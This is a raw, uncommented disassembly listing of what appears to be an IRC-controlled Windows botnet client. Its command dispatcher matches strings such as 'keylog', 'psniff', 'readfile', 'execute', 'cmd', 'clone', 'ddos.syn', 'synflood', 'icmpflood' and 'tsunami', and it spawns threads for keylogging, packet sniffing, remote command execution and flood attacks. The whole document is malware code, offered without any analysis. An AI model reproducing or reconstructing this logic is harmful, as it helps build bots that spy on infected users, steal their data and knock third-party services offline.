lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset dword_42B814
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 10h
call sub_41C2C2
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
call sub_41C2C2
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aPrivmsgSS_0 ; "PRIVMSG %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
call sub_41C2C2
cdq
mov ecx, 514h
idiv ecx
push edx
call ds:dword_427080 ; Sleep
push offset dword_427624
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
loc_405709: ; CODE XREF: sub_401ACD+3B1B�j
; sub_401ACD+3B28�j
push edi
push offset aRegister ; "register"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40574D
mov eax, [ebp+esi+var_84]
cmp eax, ebx
jz short loc_40574D
push eax
lea eax, [ebp+var_2C4]
push [ebp+esi+var_88]
push offset aNickservRegist ; "nickserv register %s %s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_417B2F
add esp, 14h
loc_40574D: ; CODE XREF: sub_401ACD+3C4B�j
; sub_401ACD+3C56�j
push edi
push offset aOff ; "off"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_40619B
mov [ebp+arg_18], offset dword_4D4A5C
loc_405769: ; CODE XREF: sub_401ACD+3CC0�j
mov eax, [ebp+arg_18]
cmp dword ptr [eax-4], 1
jnz short loc_40577F
mov eax, [eax]
cmp eax, ebx
jbe short loc_40577F
push eax
call dword_4CBA6C ; closesocket
loc_40577F: ; CODE XREF: sub_401ACD+3CA3�j
; sub_401ACD+3CA9�j
add [ebp+arg_18], 210h
cmp [ebp+arg_18], offset dword_4DB17C
jl short loc_405769
cmp [ebp+var_8], ebx
jnz loc_40619B
push ebx
push [ebp+var_4]
push offset unk_42B784
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
jmp loc_40619B
; ---------------------------------------------------------------------------
loc_4057B7: ; CODE XREF: sub_401ACD+3151�j
push [ebp+arg_8]
push offset aNick_0 ; "nick"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409554
push [ebp+arg_8]
push offset aN ; "n"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409554
push [ebp+arg_8]
push offset aJoin ; "join"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409531
push [ebp+arg_8]
push offset aJ ; "j"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409531
push [ebp+arg_8]
push offset aPart_0 ; "part"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409515
push [ebp+arg_8]
push offset aPt ; "pt"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409515
push [ebp+arg_8]
push offset aRaw ; "raw"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4094DB
push [ebp+arg_8]
push offset aR ; "r"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4094DB
push [ebp+arg_8]
push offset aKillthread ; "killthread"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409418
push [ebp+arg_8]
push offset aK ; "k"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409418
push [ebp+arg_8]
push offset aC_quit ; "c_quit"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40936D
push [ebp+arg_8]
push offset aC_q ; "c_q"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40936D
push [ebp+arg_8]
push offset aC_rndnick ; "c_rndnick"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40931F
push [ebp+arg_8]
push offset aC_rn ; "c_rn"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40931F
push [ebp+arg_8]
push offset aPrefix ; "prefix"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40930A
push [ebp+arg_8]
push offset aPr ; "pr"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40930A
push [ebp+arg_8]
push offset aOpen ; "open"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4092E0
push [ebp+arg_8]
push offset aO ; "o"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4092E0
push [ebp+arg_8]
push offset aServer_1 ; "server"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4092C7
push [ebp+arg_8]
push offset aSe ; "se"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4092C7
push [ebp+arg_8]
push offset aDns ; "dns"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40925F
push [ebp+arg_8]
push offset aDn ; "dn"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40925F
push [ebp+arg_8]
push offset aKillproc ; "killproc"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409233
push [ebp+arg_8]
push offset aKp ; "kp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_409233
push [ebp+arg_8]
push offset aKill ; "kill"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4091D8
push [ebp+arg_8]
push offset aKi ; "ki"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4091D8
push [ebp+arg_8]
push offset aDelete ; "delete"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4091A0
push [ebp+arg_8]
push offset aDel ; "del"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4091A0
push [ebp+arg_8]
push offset aGet_1 ; "get"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4090C3
push [ebp+arg_8]
push offset aGt ; "gt"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4090C3
push [ebp+arg_8]
push offset aList ; "list"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4090A5
push [ebp+arg_8]
push offset aLi ; "li"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4090A5
push [ebp+arg_8]
push offset aVisit ; "visit"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408FB5
push [ebp+arg_8]
push offset aV ; "v"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408FB5
push [ebp+arg_8]
push offset aMirccmd ; "mirccmd"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408F6F
push [ebp+arg_8]
push offset aMirc ; "mirc"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408F6F
push [ebp+arg_8]
push offset aCmd ; "cmd"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408F18
push [ebp+arg_8]
push offset aCm ; "cm"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408F18
push [ebp+arg_8]
push offset aReadfile ; "readfile"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408EA1
push [ebp+arg_8]
push offset aRf ; "rf"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408EA1
push [ebp+arg_8]
push offset aPsniff ; "psniff"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_405C9F
push edi
push offset aOn ; "on"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_405C67
push 20h
call sub_40B602
test eax, eax
pop ecx
jle short loc_405B91
push offset dword_42B68C
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405B91: ; CODE XREF: sub_401ACD+40B8�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_88]
mov [ebp+var_F5C], eax
mov eax, [ebp+var_4]
mov [ebp+var_ED4], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_ED0], eax
jnz short loc_405BD3
mov esi, offset aF_1 ; "#f"
push offset byte_43DB88
push esi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_405BD3
mov esi, [ebp+var_88]
loc_405BD3: ; CODE XREF: sub_401ACD+40E8�j
; sub_401ACD+40FE�j
push esi
lea eax, [ebp+var_F58]
push 80h
push eax
call sub_41C360
add esp, 0Ch
lea eax, [ebp+var_2C4]
push offset dword_42B65C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 20h
push eax
call sub_40B3BA
add esp, 14h
mov [ebp+var_ED8], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_F5C]
push ebx
push eax
push offset sub_412B61
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_ED8]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_405C56
loc_405C40: ; CODE XREF: sub_401ACD+4187�j
cmp [ebp+var_ECC], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_405C40
; ---------------------------------------------------------------------------
loc_405C56: ; CODE XREF: sub_401ACD+4171�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42B620
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405C67: ; CODE XREF: sub_401ACD+40A8�j
push edi
push offset aOff ; "off"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4081AD
push ebx
push 20h
call sub_40B5B5
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405C95
push eax
push offset dword_42B5E4
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405C95: ; CODE XREF: sub_401ACD+41BB�j
push offset dword_42B5B8
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405C9F: ; CODE XREF: sub_401ACD+4093�j
push [ebp+arg_8]
push offset aSniffer ; "sniffer"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_405DEF
push edi
push offset aOn ; "on"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_405DB7
push 21h
call sub_40B602
test eax, eax
pop ecx
jle short loc_405CE1
push offset unk_42B590
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405CE1: ; CODE XREF: sub_401ACD+4208�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_88]
mov [ebp+var_EC8], eax
mov eax, [ebp+var_4]
mov [ebp+var_E40], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_E3C], eax
jnz short loc_405D23
mov esi, offset aF_1 ; "#f"
push offset byte_43DB88
push esi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_405D23
mov esi, [ebp+var_88]
loc_405D23: ; CODE XREF: sub_401ACD+4238�j
; sub_401ACD+424E�j
push esi
lea eax, [ebp+var_EC4]
push 80h
push eax
call sub_41C360
add esp, 0Ch
lea eax, [ebp+var_2C4]
push offset unk_42B564
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 21h
push eax
call sub_40B3BA
add esp, 14h
mov [ebp+var_E44], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_EC8]
push ebx
push eax
push offset sub_4131EC
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_E44]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_405DA6
loc_405D90: ; CODE XREF: sub_401ACD+42D7�j
cmp [ebp+var_E38], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_405D90
; ---------------------------------------------------------------------------
loc_405DA6: ; CODE XREF: sub_401ACD+42C1�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42B528
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405DB7: ; CODE XREF: sub_401ACD+41F8�j
push edi
push offset aOff ; "off"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4081AD
push ebx
push 21h
call sub_40B5B5
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405DE5
push eax
push offset unk_42B4EC
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405DE5: ; CODE XREF: sub_401ACD+430B�j
push offset unk_42B4C0
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405DEF: ; CODE XREF: sub_401ACD+41E3�j
push [ebp+arg_8]
push offset aIdent ; "ident"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_405EC2
push edi
push offset aOn ; "on"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_405E8A
push 2
call sub_40B602
test eax, eax
pop ecx
jle short loc_405E2D
push offset dword_42B498
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405E2D: ; CODE XREF: sub_401ACD+4354�j
lea eax, [ebp+var_2C4]
push offset dword_42B46C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 2
push eax
call sub_40B3BA
add esp, 14h
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push esi
push offset sub_410BFD
push ebx
push ebx
call ds:dword_427084 ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43E924[esi], eax
jnz loc_4081AD
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42B438
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405E8A: ; CODE XREF: sub_401ACD+4348�j
push edi
push offset aOff ; "off"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4081AD
push ebx
push 2
call sub_40B5B5
pop ecx
cmp eax, ebx
pop ecx
jle short loc_405EB8
push eax
push offset dword_42B400
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_405EB8: ; CODE XREF: sub_401ACD+43DE�j
push offset dword_42B3E0
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_405EC2: ; CODE XREF: sub_401ACD+4333�j
push [ebp+arg_8]
push offset aKeyloger ; "keyloger"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408D24
push [ebp+arg_8]
push offset aKeylog ; "keylog"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408D24
push [ebp+arg_8]
push offset aStop ; "stop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408CFB
push [ebp+arg_8]
push offset aStop ; "stop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408CFB
push [ebp+arg_8]
push offset aNet ; "net"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_40616D
cmp dword_4CBAA4, ebx
jz short loc_405F4F
cmp dword_4CBACC, ebx
jz short loc_405F4F
push offset unk_42B388
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_405F4F: ; CODE XREF: sub_401ACD+446E�j
; sub_401ACD+4476�j
cmp [ebp+var_C], ebx
jz loc_406BFE
mov eax, [ebp+esi+var_88]
mov [ebp+arg_0], ebx
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_405F77
push eax
push [ebp+var_C]
call sub_41C2E0
pop ecx
mov [ebp+arg_0], eax
pop ecx
loc_405F77: ; CODE XREF: sub_401ACD+449A�j
push edi
push offset aStart ; "start"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_405FC3
cmp [ebp+arg_18], ebx
jz short loc_405F97
push [ebp+arg_0]
push 3
jmp loc_406021
; ---------------------------------------------------------------------------
loc_405F97: ; CODE XREF: sub_401ACD+44BE�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_418EA8
add esp, 0Ch
test eax, eax
jz short loc_405FB9
push offset unk_42B35C
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_405FB9: ; CODE XREF: sub_401ACD+44E0�j
push offset unk_42B33C
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_405FC3: ; CODE XREF: sub_401ACD+44B9�j
push edi
push offset aStop ; "stop"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_405FDB
push [ebp+arg_0]
push 4
jmp short loc_406021
; ---------------------------------------------------------------------------
loc_405FDB: ; CODE XREF: sub_401ACD+4505�j
push edi
push offset aPause ; "pause"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_405FF3
push [ebp+arg_0]
push 5
jmp short loc_406021
; ---------------------------------------------------------------------------
loc_405FF3: ; CODE XREF: sub_401ACD+451D�j
push edi
push offset aContinue ; "continue"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40600B
push [ebp+arg_0]
push 6
jmp short loc_406021
; ---------------------------------------------------------------------------
loc_40600B: ; CODE XREF: sub_401ACD+4535�j
push edi
push offset aDelete ; "delete"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_406033
push [ebp+arg_0]
push 1
loc_406021: ; CODE XREF: sub_401ACD+44C5�j
; sub_401ACD+450C�j ...
call sub_418C0E
pop ecx
pop ecx
loc_406028: ; CODE XREF: sub_401ACD+459F�j
; sub_401ACD+4628�j ...
push eax
push offset aS_8 ; "%s"
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_406033: ; CODE XREF: sub_401ACD+454D�j
push edi
push offset aShare ; "share"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40609B
cmp [ebp+arg_18], ebx
jz short loc_40606E
cmp [ebp+var_8FC], bl
jz short loc_406059
push ebx
push [ebp+arg_18]
push 1
jmp short loc_406064
; ---------------------------------------------------------------------------
loc_406059: ; CODE XREF: sub_401ACD+4582�j
push [ebp+esi+var_84]
push [ebp+arg_18]
push ebx
loc_406064: ; CODE XREF: sub_401ACD+458A�j
call sub_418FE5
add esp, 0Ch
jmp short loc_406028
; ---------------------------------------------------------------------------
loc_40606E: ; CODE XREF: sub_401ACD+457A�j
push ebx
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_4191DB
add esp, 10h
test eax, eax
jz short loc_406091
push offset unk_42B2FC
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_406091: ; CODE XREF: sub_401ACD+45B8�j
push offset unk_42B2DC
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_40609B: ; CODE XREF: sub_401ACD+4575�j
push edi
push offset aUser_0 ; "user"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_406127
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_4060FA
cmp [ebp+var_8FC], bl
jz short loc_4060CD
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
push ebx
push eax
push 1
jmp short loc_4060ED
; ---------------------------------------------------------------------------
loc_4060CD: ; CODE XREF: sub_401ACD+45EC�j
push [ebp+var_4]
mov esi, [ebp+esi+var_84]
cmp esi, ebx
push [ebp+var_88]
push [ebp+arg_4]
jz short loc_4060E9
push esi
push eax
push ebx
jmp short loc_4060ED
; ---------------------------------------------------------------------------
loc_4060E9: ; CODE XREF: sub_401ACD+4615�j
push ebx
push eax
push 2
loc_4060ED: ; CODE XREF: sub_401ACD+45FE�j
; sub_401ACD+461A�j
call sub_4192FC
add esp, 18h
jmp loc_406028
; ---------------------------------------------------------------------------
loc_4060FA: ; CODE XREF: sub_401ACD+45E4�j
push ebx
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_41982C
add esp, 10h
test eax, eax
jz short loc_40611D
push offset unk_42B2BC
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_40611D: ; CODE XREF: sub_401ACD+4644�j
push offset unk_42B29C
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_406127: ; CODE XREF: sub_401ACD+45DD�j
push edi
push offset aSend_0 ; "send"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_406163
cmp [ebp+arg_18], ebx
jz short loc_406159
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419AE0
add esp, 10h
jmp loc_406028
; ---------------------------------------------------------------------------
loc_406159: ; CODE XREF: sub_401ACD+466E�j
push offset unk_42B270
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_406163: ; CODE XREF: sub_401ACD+4669�j
push offset unk_42B254
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_40616D: ; CODE XREF: sub_401ACD+4462�j
push [ebp+arg_8]
push offset aGethost ; "gethost"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408C0D
push [ebp+arg_8]
push offset aGh ; "gh"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408C0D
loc_40619B: ; CODE XREF: sub_401ACD+3C8F�j
; sub_401ACD+3CC5�j ...
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_401F75
push [ebp+arg_8]
push offset aKilllog ; "killlog"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408BF0
push [ebp+arg_8]
push offset aKl ; "kl"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408BF0
push [ebp+arg_8]
push offset aAddalias ; "addalias"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408BBE
push [ebp+arg_8]
push offset aAa ; "aa"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408BBE
push [ebp+arg_8]
push offset aPrivmsg_0 ; "privmsg"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408B6D
push [ebp+arg_8]
push offset aPm ; "pm"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408B6D
push [ebp+arg_8]
push offset aAction ; "action"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408B04
push [ebp+arg_8]
push offset aA ; "a"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408B04
push [ebp+arg_8]
push offset aCycle ; "cycle"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408A9E
push [ebp+arg_8]
push offset aCy ; "cy"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408A9E
push [ebp+arg_8]
push offset aMode ; "mode"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408A64
push [ebp+arg_8]
push offset aM_0 ; "m"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408A64
push [ebp+arg_8]
push offset aC_raw ; "c_raw"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4089F6
push [ebp+arg_8]
push offset aC_r ; "c_r"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4089F6
push [ebp+arg_8]
push offset aC_mode ; "c_mode"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408971
push [ebp+arg_8]
push offset aC_m ; "c_m"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408971
push [ebp+arg_8]
push offset aC_nick ; "c_nick"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408900
push [ebp+arg_8]
push offset aC_n ; "c_n"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408900
push [ebp+arg_8]
push offset aC_join ; "c_join"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4088DA
push [ebp+arg_8]
push offset aC_j ; "c_j"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4088DA
push [ebp+arg_8]
push offset aC_part ; "c_part"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40887A
push [ebp+arg_8]
push offset aC_p ; "c_p"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40887A
push [ebp+arg_8]
push offset aTarga3 ; "targa3"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40877F
push [ebp+arg_8]
push offset aT3 ; "t3"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_40877F
push [ebp+arg_8]
push offset aTsunami ; "tsunami"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4086AA
push [ebp+arg_8]
push offset aTsn ; "tsn"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4086AA
push [ebp+arg_8]
push offset aRepeat ; "repeat"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4085A5
push [ebp+arg_8]
push offset aRp ; "rp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4085A5
push [ebp+arg_8]
push offset aDelay ; "delay"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408508
push [ebp+arg_8]
push offset aDe ; "de"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408508
push [ebp+arg_8]
push offset aHadeth3 ; "HADETH3"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408379
push [ebp+arg_8]
push offset aHadeth3 ; "HADETH3"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408379
push [ebp+arg_8]
push offset aExecute ; "execute"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4082E6
push [ebp+arg_8]
push offset aE ; "e"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4082E6
push [ebp+arg_8]
push offset aFindfile ; "findfile"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4081D7
push [ebp+arg_8]
push offset aFf ; "ff"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_4081D7
push [ebp+arg_8]
push offset aRename ; "rename"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408160
push [ebp+arg_8]
push offset aMv ; "mv"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408160
push [ebp+arg_8]
push offset aIcmpflood ; "icmpflood"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408063
push [ebp+arg_8]
push offset aIcmp ; "icmp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_408063
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_401F75
push [ebp+arg_8]
push offset aClone_0 ; "clone"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407F7B
push [ebp+arg_8]
push offset aC ; "c"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407F7B
push [ebp+arg_8]
push offset aDdos_syn ; "ddos.syn"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407E82
push [ebp+arg_8]
push offset aDdos_ack ; "ddos.ack"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407E82
push [ebp+arg_8]
push offset aDdos_random ; "ddos.random"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407E82
push [ebp+arg_8]
push offset aWisdom_udp ; "wisdom.udp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4066AE
push 7Fh
lea eax, [ebp+var_3280]
pop esi
push esi
push edi
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3200]
push [ebp+arg_18]
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3180]
push [ebp+arg_0]
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3100]
push [ebp+var_88]
push eax
call sub_41BFD0
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
mov esi, [ebp+arg_4]
mov [ebp+var_3078], eax
push ebx
lea eax, [ebp+var_2C4]
push 13h
push eax
mov [ebp+var_307C], edi
mov [ebp+var_3284], esi
call sub_40B3BA
add esp, 3Ch
mov [ebp+var_3080], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3284]
push ebx
push eax
push offset sub_41525A
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_3080]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40669D
loc_406687: ; CODE XREF: sub_401ACD+4BCE�j
cmp [ebp+var_3074], ebx
jnz loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_406687
; ---------------------------------------------------------------------------
loc_40669D: ; CODE XREF: sub_401ACD+4BB8�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42B0E0
jmp loc_403D37
; ---------------------------------------------------------------------------
loc_4066AE: ; CODE XREF: sub_401ACD+4B0E�j
push [ebp+arg_8]
push offset aSynflood ; "synflood"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407D9A
push [ebp+arg_8]
push offset aSyn ; "syn"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_407D9A
push [ebp+arg_8]
push offset aSkysyn ; "skysyn"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_4067DB
push 7Fh
lea eax, [ebp+var_36A8]
pop esi
push esi
push edi
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3628]
push [ebp+arg_18]
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_35A8]
push [ebp+arg_0]
push eax
call sub_41BFD0
push esi
lea eax, [ebp+var_3528]
push [ebp+var_88]
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_34A4], eax
push [ebp+arg_0]
mov eax, [ebp+var_8]
mov [ebp+var_34A0], eax
lea eax, [ebp+var_2C4]
push [ebp+arg_18]
mov [ebp+var_36AC], esi
push edi
push offset dword_42B098
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 10h
push eax
call sub_40B3BA
add esp, 20h
mov [ebp+var_34A8], eax
